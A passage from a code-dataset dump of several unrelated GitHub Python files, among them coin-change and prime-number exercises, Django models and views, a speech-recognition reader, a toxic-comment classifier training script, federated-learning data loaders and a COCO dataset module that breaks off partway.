","repo_name":"graphretrieval/ESSIso","sub_path":"generate_data/utils/corrupt_graph.py","file_name":"corrupt_graph.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"71784306152","text":"'''\nReview again\n'''\ndef countMakingCoinCase(p):\n coins = [25, 10, 5, 1]\n dp = [[-1]*(p+1) for i in range(4)]\n\n def dfs(index, price):\n if price == 0:\n return 1\n\n if index > 3:\n return 0\n if price < 0:\n return 0\n\n if dp[index][price] != -1:\n return dp[index][price]\n\n orig_price = price # memoize under the original price, not the decremented one\n ret = 0\n while price >= 0:\n ret += dfs(index+1, price)\n price = price - coins[index]\n dp[index][orig_price] = ret\n return ret\n\n return dfs(0, p)\n\nprint(countMakingCoinCase(100))\nprint(sorted('hellow'))\n","repo_name":"yhancsx/algorithm-weekly","sub_path":"cracking_the_coding_interview/8.11.py","file_name":"8.11.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"18287590394","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', 
serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(default=b'No title', max_length=50)),\n ('photo', models.ImageField(upload_to=b'photos/')),\n ('pub_date', models.DateField(auto_now_add=True)),\n ('favorite', models.BooleanField(default=False)),\n ('comment', models.CharField(max_length=200, blank=True)),\n ('category', models.ForeignKey(blank=True, to='album.Category', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"cristianjs19/viaje-blog","sub_path":"album/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42704241577","text":"import speech_recognition as sr\nfrom src.reader import Reader\n\n\nclass MicrophoneReader(Reader):\n \"\"\"A class based on the speech recognition package to listen to audio continuously via microphone inputs.\"\"\"\n\n RECORD = {\n \"en-US\": \"Say something!\",\n \"fa-IR\": \"چیزی بگو!\"\n }\n\n def __init__(self, *args, **kwargs):\n super(MicrophoneReader, self).__init__(*args, **kwargs)\n\n def read(self):\n self.adjust_amb_noise(self.language)\n audio = self.record(self.language)\n return self.recognize_google(audio, self.language)\n\n def adjust_amb_noise(self, language):\n self._print(self.ADJUST_AMB_NOISE.get(language, ''), self.verbose, self.safe_rtl)\n\n with sr.Microphone() as source:\n self.r.adjust_for_ambient_noise(source)\n\n self._print(self.ENERGY_THRESHOLD.get(language, '').format(\n self.r.energy_threshold), self.verbose, self.safe_rtl)\n return self\n\n def record(self, language):\n with sr.Microphone() as source:\n self._print(self.RECORD.get(language, ''),\n self.verbose, self.safe_rtl)\n return self.r.listen(source)\n","repo_name":"hooshvare/speech2text","sub_path":"src/mic.py","file_name":"mic.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"6070175299","text":"import os\nimport time\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import ShuffleSplit\n\nimport toxic_model.config as config\nfrom toxic_model.models import train_model\nfrom toxic_model.preprocessing import prepare_data, get_embedding_matrix\nfrom toxic_model.utils import load_pickle, create_pickle, create_json, custom_multi_label_skfold, create_submission_file\n\n# preprocessing comment config\npreprocess_para = {\n \"max_seq_len\": 100,\n \"max_nb_words\": 200000,\n \"remove_apostrophe\": True,\n \"remove_stopwords\": False,\n \"stemming\": False,\n \"lemmatization\": False,\n \"alpha_numeric\": False\n}\n\n# model hyperparameters\nmodel_para = {\n 'input_seq_len': preprocess_para['max_seq_len'], # input sequence length\n 'spatial_dropout': 0.2, # spatial dropout after embedding layer\n 'num_rnn_layers': 1, # number of lstm and gru layers\n 'rnn_layer_type': 'gru', # gru / lstm layer\n 'num_rnn_units': [80], # hidden units for lstm / gru\n 'dropout_concat': 0.2, # dropout before dense layer\n 'num_units_dense1': 100, # hidden units dense layer\n 'dropout_dense1': 0.2, # dropout after dense layer\n 'num_output': 6 # number of output labels\n}\n\n# 
training configurations\ntraining_para = {\n 'batch_size': 256,\n 'max_epoch': 50,\n 'shuffle': True,\n 'ensemble_kfold': True, # True for stratified KFold ensembling\n 'stratified_kfold': 10, # number of Folds\n 'validation_spit': 0.1, # will not be used in case of ensemble KFOLD,\n # floor value of inverse will be used as number of folds\n 'embedding_type': 'fasttext_wiki', # 'glove_840B', 'glove_twitter', 'fasttext_wiki', 'fasttext_crawl'\n 'embedding_size': 300,\n 'tensorboard_callback': True\n}\n\n\ndef prepare_and_train(train_count, configs):\n \"\"\"\n function for preparing data, training model, test submissions predictions\n :param train_count: train iteration useful for keeping track for different versions\n :param configs: (preprocess_config, training_config, model_para)\n :return: None\n \"\"\"\n\n preprocess_config, training_config, model_config = configs\n\n # creating iteration directory if doesn't exist\n if not os.path.exists(config.OUTPUT_DIR.format(train_count)):\n os.mkdir(config.OUTPUT_DIR.format(train_count))\n\n # Preprocessing data and create pickle if doesn't exist\n if os.path.exists(config.DATA_PKL.format(train_count)):\n data_dict = load_pickle(config.DATA_PKL.format(train_count))\n else:\n data_dict = prepare_data(config.TRAIN_CSV, config.TEST_CSV, preprocess_config)\n # creating word embedding matrix from word_index dictionary\n data_dict['word_embedding_matrix'] = get_embedding_matrix(training_config['embedding_type'],\n training_config['embedding_size'],\n data_dict['word_index'])\n create_pickle(data_dict, config.DATA_PKL.format(train_count))\n\n # custom Stratified KFold for ensembling\n if training_config['ensemble_kfold']:\n train_val_split = custom_multi_label_skfold(data_dict['train_labels'],\n training_config['stratified_kfold'])\n else:\n # shuffle split for creating train and val split, if not doing ensembling\n shuffle_split = ShuffleSplit(n_splits=1,\n test_size=training_config['validation_spit'])\n train_val_split = shuffle_split.split(data_dict['train_labels'])\n\n test_results = []\n fold_count = 0\n for train_index, val_index in train_val_split:\n # getting train and validation data\n train_data = (data_dict['train_seq'][train_index], data_dict['train_labels'][train_index],\n data_dict['train_seq'][val_index], data_dict['train_labels'][val_index])\n\n # training model\n model = train_model(train_count, (training_config, model_config), train_data, fold_count,\n data_dict['word_embedding_matrix'])\n\n # predicting on train data and ROC score calculation\n train_predict = model.predict(data_dict['train_seq'])\n train_roc_score = roc_auc_score(data_dict['train_labels'][train_index], train_predict[train_index])\n val_roc_score = roc_auc_score(data_dict['train_labels'][val_index], train_predict[val_index])\n print(\"train roc score\", train_roc_score)\n print(\"validation roc score\", val_roc_score)\n\n # predicting on test data\n test_results.append(model.predict(data_dict['test_seq']))\n fold_count += 1\n\n # average ensembling for number for folds\n test_output = np.sum(np.asarray(test_results), axis=0)/fold_count\n\n # save predictions for submission\n create_submission_file(test_output, config.TEST_SUBMISSION_FILE.format(train_count))\n\n # save config data in json\n config_data = {\n \"timestamp\": time.time(),\n \"preprocess_config\": preprocess_config,\n \"model_config\": model_config,\n \"training_config\": training_config\n }\n create_json(config_data, config.CONFIG_JSON.format(train_count))\n\n\nif __name__ == '__main__':\n # Train and 
prepare submission for configured hyper parameters\n # weighted ensemble from utils can be used for ensembling different hyper parameter models\n train_iteration = 100\n print(\"Train iteration :\", train_iteration)\n prepare_and_train(train_iteration, (preprocess_para, training_para, model_para))\n","repo_name":"drc10723/toxic_comments_multilabel_classification","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"28296273395","text":"import pandas as pd\n\n# data = pd.read_csv('weather_data.csv')\n#\n# data_dict = data.to_dict()\n# #print(data_dict)\n#\n# temp_list = data['temp'].to_list()\n# #print(temp_list)\n\n# sum=0\n# for temp in temp_list:\n# sum = sum+temp\n# avg = sum/len(temp_list)\n# #print(avg)\n\n#print(data[data['day']=='Monday']['temp'])\n\n# data = {\n# 'students': [\"Amy\", \"James\", \"Angela\"],\n# \"scores\": [76,56,65]\n# }\n#\n# data_df = pd.DataFrame(data)\n#\n# print(data_df)\nsquirrel = pd.read_csv('2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv')\n#print(squirrel['Primary Fur Color'].value_counts())\n# squirrel_count = squirrel['Primary Fur Color'].value_counts().to_frame()\n# print(squirrel_count)\n\ngray_squirrel_count= len(squirrel[squirrel['Primary Fur Color'] == 'Gray'])\nred_squirrel_count= len(squirrel[squirrel['Primary Fur Color'] == 'Cinnamon'])\nblack_squirrel_count= len(squirrel[squirrel['Primary Fur Color'] == 'Black'])\n\ndata_dict = {\n \"Fur color\":[\"Gray\", \"Cinnamon\", \"Black\"],\n \"Count\": [gray_squirrel_count, red_squirrel_count, black_squirrel_count]\n}\nsf = pd.DataFrame(data_dict)\nsf.to_csv('squirrel_count.csv')","repo_name":"XSiddhSaraf/100DaysOfCode","sub_path":"pandas_introduction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"31101098558","text":"# prime numbers\n# primality testing\n\n# M = int(input())\n# N = int(input())\n\n# arr = []\n# for i in range(N-M+1) :\n# arr.append(i+M)\n# for i in range(N) :\n# if i!=0 and i!=1 :\n# for j in arr :\n# if (i < j and j%i == 0) or j == 1 :\n# arr.remove(j)\n# if len(arr) == 0 :\n# print(-1)\n# else :\n# min = arr[0]\n# sum = 0\n# for i in arr :\n# if i<min :\n# min = i\n# sum += i\n\n# print(sum)\n# print(min)\n\nM = int(input())\nN = int(input())\n\nsum = 0\nmin = 0\nfor i in range(M, N+1) :\n # determine whether i is prime\n isPrime = True\n for j in range(2, i) :\n if i % j == 0:\n isPrime = False\n break\n if i != 1 and isPrime :\n if sum == 0 :\n # the first prime found is the minimum\n min = i\n sum += i\n\nif sum == 0 :\n print(-1)\nelse :\n print(sum)\n print(min)","repo_name":"halionaz/Algorithm","sub_path":"baekjoon/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"28907621442","text":"from __future__ import unicode_literals\n\nfrom django.db.models import Max, Min\nfrom django.views.generic import TemplateView, ListView, DetailView\n\nfrom .models import Project\n\n\nclass AboutView(TemplateView):\n\ttemplate_name = 'bio.html'\n\n\nclass HomeView(ListView):\n\ttemplate_name = 'index.html'\n\tmodel = Project\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(HomeView, self).get_context_data(**kwargs)\n\t\tcontext['project_list'] = 
Project.objects.filter(\n\t\t\tfeatured=True).order_by('order')\n\t\treturn context\n\n\nclass WorkList(ListView):\n\tmodel = Project\n\ttemplate_name = 'work.html'\n\tordering = ('order')\n\n\nclass WorkDetail(DetailView):\n\tmodel = Project\n\ttemplate_name = 'work_detail.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(WorkDetail, self).get_context_data(**kwargs)\n\t\tcontext['tags'] = Project.objects.filter(tags=True)\n\t\tcontext['happy_chat'] = ['Building', 'Creating', 'The Making of', 'About']\n\n\t\t# Add previous and next projects for end-of-page links\n\t\tcurrent = context['project'].order\n\t\tfirst = Project.objects.all().aggregate(Min('order'))['order__min']\n\t\tlast = Project.objects.all().aggregate(Max('order'))['order__max']\n\t\tif current > first:\n\t\t\tcontext['previous'] = Project.objects.get(order=current-1)\n\t\tif current < last:\n\t\t\tcontext['next'] = Project.objects.get(order=current+1)\n\t\treturn context\n","repo_name":"SarahJaine/sarahjaine.com","sub_path":"sarahjaine/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33185235419","text":"\"\"\"\nFunctions for loading FEMNIST, CIFAR100, Shakespeare, StackOverflow datasets.\nPyTorchDataFeeder class for conveniently containing a single worker's dataset,\nand retrieving a stream of data batches from it. Also has some data utility \nfunctions.\n\"\"\"\nimport torch\nimport pickle\nimport numpy as np\nimport os\nimport json\nimport h5py\nimport scipy.sparse\nimport idx2numpy\nfrom torchvision import datasets, transforms\n\n \nclass PyTorchDataFeeder():\n \"\"\"\n Used to easily contain the samples of a FL worker. Can hold the samples on \n the GPU, and produce an endless stream of randomly drawn samples with a \n given transformation applied.\n \"\"\"\n\n def __init__( self, x, x_dtype, y, y_dtype, device, \n cast_device=None, transform=None):\n \"\"\"\n Return a new PyTorchDataFeeder with copies of x and y as torch.tensors.\n Data will be stored on device. If x_dtype or y_dtype are the string \n 'long' then these tensors will be cast to the torch long dtype (used\n typically when pytorch models are expecting integer values). If \n cast_device is passed, the data returned by next_batch will be cast to \n this device. Doing so allows data held on the CPU to be easily fed to a \n model sitting in the GPU memory, if, for example, all data won't fit in\n GPU memory. If transform is passed, the samples returned by next_batch \n are transformed by this function.\n \n Args:\n - x: {numpy.ndarray, torch.tensor} of samples\n - x_dtype: {torch.dtype, 'long'} that x will be\n - y: {numpy.ndarray, torch.tensor} of targets\n - y_dtype: {torch.dtype, 'long'} that y will be \n - device: {torch.device} that x and y will sit on\n - cast_device: {torch.device} next_batch returned data will be on here\n - transform: {callable} applied by next_batch\n \"\"\"\n self.x, self.x_sparse = self._matrix_type_to_tensor(x, x_dtype, device)\n self.y, self.y_sparse = self._matrix_type_to_tensor(y, y_dtype, device)\n self.idx = 0\n self.n_samples = x.shape[0]\n self.cast_device = cast_device\n self.transform = transform\n self.active = False\n self.activate()\n self._shuffle_data()\n self.deactivate()\n \n def _matrix_type_to_tensor(self, matrix, dtype, device):\n \"\"\"\n Converts a scipy.sparse.coo_matrix or a numpy.ndarray into a \n torch.sparse_coo_tensor or torch.tensor. 
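Sparse inputs keep their COO\n indices; dense arrays are copied directly, and the special dtype\n value 'long' mirrors PyTorch's integer-label convention.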
\n \n Args:\n - matrix: {scipy.sparse.coo_matrix or np.ndarray} to convert\n - dtype: {torch.dtype} of the tensor to make \n - device: {torch.device} where the tensor should be placed\n \n Returns: (tensor, is_sparse)\n - tensor: {torch.sparse_coo_tensor or torch.tensor}\n - is_sparse: {bool} True if returning a torch.sparse_coo_tensor\n \"\"\"\n if type(matrix) == scipy.sparse.coo_matrix:\n is_sparse = True\n idxs = np.vstack((matrix.row, matrix.col))\n\n if dtype == 'long':\n tensor = torch.sparse_coo_tensor( idxs, \n matrix.data, \n matrix.shape, \n device=device, \n dtype=torch.int32).long()\n \n else:\n tensor = torch.sparse_coo_tensor( idxs, \n matrix.data, \n matrix.shape, \n device=device, \n dtype=dtype)\n \n elif type(matrix) == np.ndarray:\n is_sparse = False\n if dtype == 'long':\n tensor = torch.tensor( matrix, \n device=device, \n dtype=torch.int32).long()\n else:\n tensor = torch.tensor( matrix, \n device=device, \n dtype=dtype)\n else:\n raise TypeError('Only np.ndarray/scipy.sparse.coo_matrix accepted.')\n \n return tensor, is_sparse\n \n \n \n def activate(self):\n \"\"\"\n Activate this PyTorchDataFeeder to allow .next_batch(...) to be called. \n Will turn torch.sparse_coo_tensors into dense representations ready for \n training.\n \"\"\"\n self.active = True\n self.all_x_data = self.x.to_dense() if self.x_sparse else self.x\n self.all_y_data = self.y.to_dense() if self.y_sparse else self.y\n \n def deactivate(self):\n \"\"\"\n Deactivate this PyTorchDataFeeder to disallow .next_batch(...). Will \n deallocate the dense matrices created by activate to save memory.\n \"\"\"\n self.active = False\n self.all_x_data = None\n self.all_y_data = None\n \n \n def _shuffle_data(self):\n \"\"\"\n Co-shuffle the x and y data.\n \"\"\"\n if not self.active:\n raise RuntimeError('_shuffle_data(...) called when feeder not active.')\n \n ord = torch.randperm(self.n_samples)\n self.x = self.all_x_data[ord].to_sparse() if self.x_sparse else self.all_x_data[ord]\n self.y = self.all_y_data[ord].to_sparse() if self.y_sparse else self.all_y_data[ord]\n \n def next_batch(self, B):\n \"\"\"\n Return a batch of randomly ordered data from this dataset. If B=-1, \n return all the data as one big batch. If self.cast_device is not None, \n then data will be sent to this device before being returned. If \n self.transform is not None, that function will be applied to the data \n before being returned.\n \n Args:\n - B: {int} size of batch to return.\n \"\"\"\n if not self.active:\n raise RuntimeError('next_batch(...) called when feeder not active.')\n \n if B == -1: # return all data as big batch\n x = self.all_x_data\n y = self.all_y_data\n self._shuffle_data()\n \n elif self.idx + B > self.n_samples: # need to wraparound dataset \n extra = (self.idx + B) - self.n_samples\n x = torch.cat(( self.all_x_data[self.idx:], \n self.all_x_data[:extra]))\n y = torch.cat(( self.all_y_data[self.idx:], \n self.all_y_data[:extra]))\n self._shuffle_data()\n self.idx = 0\n \n else: # next batch can easily be obtained\n x = self.all_x_data[self.idx:self.idx+B]\n y = self.all_y_data[self.idx:self.idx+B]\n self.idx += B\n \n if not self.cast_device is None: # send to cast_device\n x = x.to(self.cast_device)\n y = y.to(self.cast_device)\n \n if not self.transform is None: # perform transformation\n x = self.transform(x)\n\n return x, y\n\n\ndef load_femnist(train_dir, test_dir, W):\n \"\"\"\n Load the FEMNIST data contained in train_dir and test_dir. 
These dirs should\n contain only .json files that have been produced by the LEAF \n (https://leaf.cmu.edu/) preprocessing tool. Will load W workers' worth of \n data from these files.\n \n Args:\n - train_dir: {str} path to training data folder\n - test_dir: {str} path to test data folder\n - W: {int} number of workers' worth of data to load\n \n Returns: (x_train, y_train), (x_test, y_test)\n - x_train: {list} of np.ndarrays\n - y_train: {list} of np.ndarrays\n - x_test: {np.ndarray}\n - y_test: {np.ndarray}\n \"\"\"\n train_fnames = sorted([train_dir+'/'+f for f in os.listdir(train_dir)])\n test_fnames = sorted([test_dir+'/'+f for f in os.listdir(test_dir)])\n # each .json file contains data for 100 workers\n n_files = int(np.ceil(W / 100))\n \n x_train = []\n y_train = []\n x_test = []\n y_test = []\n\n tot_w = 0\n for n in range(n_files):\n with open(train_fnames[n], 'r') as f:\n train = json.load(f)\n with open(test_fnames[n], 'r') as f:\n test = json.load(f)\n \n keys = sorted(train['user_data'].keys())\n \n for key in keys:\n # (1.0 - data) so images are white on black like classic MNIST\n x = 1.0 - np.array(train['user_data'][key]['x'], dtype=np.float32)\n x = x.reshape((x.shape[0], 28, 28, 1))\n # transpose (rather than reshape) required to get actual order of \n # data in ndarray to change. If reshape is used, when data is \n # passed to a torchvision.transform, then the resulting images come\n # out incorrectly.\n x = np.transpose(x, (0, 3, 1, 2))\n y = np.array(train['user_data'][key]['y'])\n \n x_train.append(x)\n y_train.append(y)\n \n x = 1.0 - np.array(test['user_data'][key]['x'], dtype=np.float32)\n x = x.reshape((x.shape[0], 28, 28, 1))\n x = np.transpose(x, (0, 3, 1, 2))\n y = np.array(test['user_data'][key]['y'])\n \n x_test.append(x)\n y_test.append(y)\n \n tot_w += 1\n \n if tot_w == W:\n break\n \n assert tot_w == W, 'Could not load enough workers from files.'\n \n x_test = np.concatenate(x_test)\n y_test = np.concatenate(y_test)\n\n return (x_train, y_train), (x_test, y_test)\n\ndef load_cifar10(num_users, n_class, n_samples, rate_unbalance):\n \"\"\"\n This non-i.i.d cifar10 is implemented from\n https://github.com/jeremy313/non-iid-dataset-for-personalized-federated-learning\n the official implementation of the non-iid dataset in \"LotteryFL: Personalized and\n Communication-Efficient Federated Learning with Lottery Ticket Hypothesis on Non-IID Datasets\".\n Args:\n - num_users: {int} the number of workers\n - n_class: {int} the number of image classes each client has\n - n_samples: {int{ the number of samples per class distributed to clients\n - rate_unbalance: {float} unbalance rate of cifar10 data, (0-1) 1 denotes balanced\n \"\"\"\n data_dir = '../data/CIFAR10_data/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Pad(4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])\n train_dataset = datasets.CIFAR10(data_dir, train=True, download=True,\n transform=apply_transform)\n\n test_dataset = datasets.CIFAR10(data_dir, train=False, download=True,\n transform=apply_transform)\n\n test_imgs, test_labels = test_dataset.data, test_dataset.targets\n train_imgs, train_labels = train_dataset.data, train_dataset.targets\n\n # transpose (rather than reshape) required to get actual order of\n # data in ndarray to change. 
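# --- [Editor's aside, not part of the original record] ---------------------
# The transpose-vs-reshape point made in the surrounding comment, shown
# concretely: np.transpose permutes axes (NHWC -> NCHW) while keeping each
# image's pixels intact, which reshape would not do. Shapes are toy values.
import numpy as np
imgs_nhwc = np.random.rand(8, 28, 28, 1).astype(np.float32)  # N, H, W, C
imgs_nchw = np.transpose(imgs_nhwc, (0, 3, 1, 2))            # N, C, H, W
assert imgs_nchw.shape == (8, 1, 28, 28)
assert imgs_nchw[0, 0, 5, 7] == imgs_nhwc[0, 5, 7, 0]        # same pixel
# ---------------------------------------------------------------------------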
If reshape is used, when data is\n # passed to a torchvision.transform, then the resulting images come\n # out incorrectly.\n train_imgs = [np.transpose(imgs, (2, 0, 1)) for imgs in train_imgs]\n test_imgs = [np.transpose(imgs, (2, 0, 1)) for imgs in test_imgs]\n\n # Chose euqal splits for every user\n num_shards_train, num_imgs_train = int(50000 / n_samples), n_samples\n num_classes = 10\n assert (n_class * num_users <= num_shards_train)\n assert (n_class <= num_classes)\n idx_shard = [i for i in range(num_shards_train)]\n dict_users_train = {i: np.array([]) for i in range(num_users)}\n idxs = np.arange(num_shards_train * num_imgs_train)\n\n labels = train_labels\n # labels_test_raw = np.array(test_dataset.targets)\n\n # sort labels\n idxs_labels = np.vstack((idxs, labels))\n idxs_labels = idxs_labels[:, idxs_labels[1, :].argsort()]\n idxs = idxs_labels[0, :]\n labels = idxs_labels[1, :]\n\n # divide and assign\n for i in range(num_users):\n user_labels = np.array([])\n rand_set = set(np.random.choice(idx_shard, n_class, replace=False))\n idx_shard = list(set(idx_shard) - rand_set)\n unbalance_flag = 0\n for rand in rand_set:\n if unbalance_flag == 0:\n dict_users_train[i] = np.concatenate(\n (dict_users_train[i], idxs[rand * num_imgs_train:(rand + 1) * num_imgs_train]), axis=0)\n user_labels = np.concatenate((user_labels, labels[rand * num_imgs_train:(rand + 1) * num_imgs_train]),\n axis=0)\n else:\n dict_users_train[i] = np.concatenate(\n (dict_users_train[i], idxs[rand * num_imgs_train:int((rand + rate_unbalance) * num_imgs_train)]),\n axis=0)\n user_labels = np.concatenate(\n (user_labels, labels[rand * num_imgs_train:int((rand + rate_unbalance) * num_imgs_train)]), axis=0)\n unbalance_flag = 1\n\n train_xs, train_ys = [], []\n train_imgs = np.array(train_imgs)\n train_labels = np.array(train_labels)\n for key in dict_users_train.keys():\n idx = dict_users_train[key].astype(int)\n train_x = train_imgs[idx]\n train_y = train_labels[idx]\n train_xs.append(train_x)\n train_ys.append(train_y)\n\n return (train_xs, train_ys), (test_imgs, test_labels)\n \ndef to_tensor(x, device, dtype):\n \"\"\"\n Returns x as a torch.tensor.\n \n Args:\n - x: {np.ndarray} data to convert\n - device: {torch.device} where to store the tensor\n - dtype: {torch.dtype or 'long'} type of data\n \n Returns: {torch.tensor}\n \"\"\"\n if dtype == 'long':\n return torch.tensor(x, device=device, \n requires_grad=False, dtype=torch.int32).long()\n else:\n return torch.tensor(x, device=device, requires_grad=False, dtype=dtype)\n\n\n\ndef step_values(x, m):\n \"\"\"\n Return a stepwise copy of x, where the values of x that are equal to m are \n taken from the last non-m value of x.\n \n Args:\n - x: {np.ndarray} values to make step-wise\n - m: {number} (same type as x) value to step over/ignore\n \"\"\"\n stepped = np.zeros_like(x)\n curr = x[0]\n \n for i in range(1, x.size):\n if x[i] != m:\n curr = x[i]\n stepped[i] = curr\n \n return stepped\n\ndef sum_model_L2_distance(x, y):\n \"\"\"\n Args:\n - x: {NumpyModel}\n - y: {NumpyModel}\n\n Returns: {float} Sum L2 distance between tensors in x and y.\n \"\"\"\n dists = (x - y) ** 2\n sums = [np.sum(d) for d in dists]\n sqrts = [np.sqrt(s) for s in sums]\n return np.sum(sqrts)\n \ndef n_bits(array):\n \"\"\"\n Args:\n - array: {np.ndarray}\n\n Returns:\n - bits: {int} the bits of the array\n \"\"\"\n bits = 8 * array.nbytes\n return bits\n\ndef orthogonalize(matrix, eps=1e-8):\n n, m = matrix.shape\n for i in range(m):\n # Normalize the i'th column\n col = matrix[:, 
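# --- [Editor's aside, not part of the original record] ---------------------
# The core of the non-i.i.d. split above, in isolation: sort sample indices
# by label, cut them into shards, and hand each client a few random shards.
# All sizes below are toy assumptions, not the values used in the function.
import numpy as np
labels = np.random.randint(0, 10, size=100)
shards = np.split(np.argsort(labels), 10)         # indices grouped by class
picked = np.random.choice(10, size=2, replace=False)
client_idxs = np.concatenate([shards[s] for s in picked])
# ---------------------------------------------------------------------------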
i:i+1]\n col /= np.sqrt(np.sum(col ** 2)) + eps\n matrix[:, i:i+1] = col\n # Project it on the rest and remove it\n if i + 1 < m:\n rest = matrix[:, i+1:]\n rest -= np.sum(col * rest, axis=0) * col\n matrix[:, i+1:] = rest\n return matrix\n","repo_name":"Vblack929/BCFed","sub_path":"fl/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":15853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"183174679","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nif __name__ == '__main__':\n import __classic_import # noqa\nelse:\n from . import __classic_import # noqa\nimport market.access.agent.mt.env as env\n\n\nclass T(env.AgentSuite):\n NodeId = None\n\n @classmethod\n def connect(cls):\n return {\n 'access_server': cls.access_agent.access_server\n }\n\n @classmethod\n def prepare(cls):\n cls.access_agent.config.Downloader.Dry = True\n cls.access_agent.config.Installer.Dry = True\n cls.access_agent.config.Consumer.BlindLoadInterval.seconds = 100500\n\n def test_blind_load(self):\n self.access_server.create_publisher('dwarf')\n self.access_server.create_resource('gold', publisher_name='dwarf')\n self.access_server.create_version(resource_name='gold', rbtorrent='link-to-file')\n\n session = self.access_agent.create_session()\n resource = self.access_agent.install_resource_sync(session.id, 'gold')\n self.access_agent.commit_resource(session.id, 'gold', resource.load[0].spec.version.number)\n version_number = resource.load[0].spec.version.number\n\n self.access_server.stop_server()\n\n session = self.access_agent.create_session()\n resource = self.access_agent.install_resource_sync(session.id, 'gold')\n self.assertEqual(resource.load[0].spec.version.number, version_number)\n\n\nif __name__ == '__main__':\n env.main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_blind_load.py","file_name":"test_blind_load.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33786197380","text":"import json\nimport numpy as np\nimport os\nimport tqdm\n\nfrom tensorpack.utils import logger\nfrom tensorpack.utils.timer import timed_operation\n\nfrom config import config as cfg\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\n\nfrom FasterRCNN.dataset import DatasetRegistry\nfrom FasterRCNN.dataset import DatasetSplit\nfrom FasterRCNN.dataset.coco import COCODetection as COCODetectionBase\nfrom FasterRCNN.dataset.coco import register_coco as register_coco_supervised\n\n__all__ = [\"register_coco\"]\n\n\n# register semi-supervised splits for coco\nSEMI_SUPERVISED_SPLITS = []\nfor seed in range(1, 6):\n for percent in [1, 2, 5, 10, 20, 30, 40, 50]:\n SEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}\".format(seed, percent))\n # adding corresponding unlabeled one\n SEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}-unlabeled\".format(\n seed, percent))\n# 100% , unlab is with lab\nSEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}-extra\".format(0, 100))\nSEMI_SUPERVISED_SPLITS.append(\"train2017.{}@{}-extra-unlabeled\".format(0, 100))\n# coco unlabled data\nSEMI_SUPERVISED_SPLITS.append(\"unlabeled2017\")\n# coco 20 class unlabeled for voc\nNUM_20CLASS = 1\nSEMI_SUPERVISED_SPLITS.append(\"unlabeledtrainval20class\")\n\n\nclass COCODetection(COCODetectionBase):\n \"\"\"COCO class object.\n\n Mapping from the incontinuous COCO category id to an id in [1, #category]\n For 
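# --- [Editor's aside, not part of the original record] ---------------------
# orthogonalize() above is in-place classical Gram-Schmidt; the invariant it
# builds (orthonormal columns), checked here via NumPy's reference QR on a
# toy matrix:
import numpy as np
q, _ = np.linalg.qr(np.random.randn(6, 3))        # q has orthonormal columns
assert np.abs(q.T @ q - np.eye(3)).max() < 1e-8
# ---------------------------------------------------------------------------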
